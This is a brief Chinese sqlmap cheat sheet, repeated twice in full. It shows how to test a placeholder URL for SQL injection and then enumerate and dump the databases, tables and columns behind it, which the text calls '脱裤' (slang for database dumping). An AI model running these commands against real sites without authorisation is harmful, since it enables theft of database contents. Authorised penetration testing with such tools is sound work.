1、启动
cmd 进入到sqlmap.py的路径
python sqlmap.py
2、检测URL是否是真的有注入
python sqlmap.py -u "http://xxxxx/my?type=d"
3、如果有注入,可以试下脱裤
-u URL
-D 数据库名
-T 表名
sqlmap -u "" --dbs
sqlmap -u "" -D "" --tables
sqlmap -u "" -D "" -T "" --columns
1、启动
cmd 进入到sqlmap.py的路径
python sqlmap.py
2、检测URL是否是真的有注入
python sqlmap.py -u "http://xxxxx/my?type=d"
3、如果有注入,可以试下脱裤
-u URL
-D 数据库名
-T 表名
sqlmap -u "" --dbs
sqlmap -u "" -D "" --tables
sqlmap -u "" -D "" -T "" --columns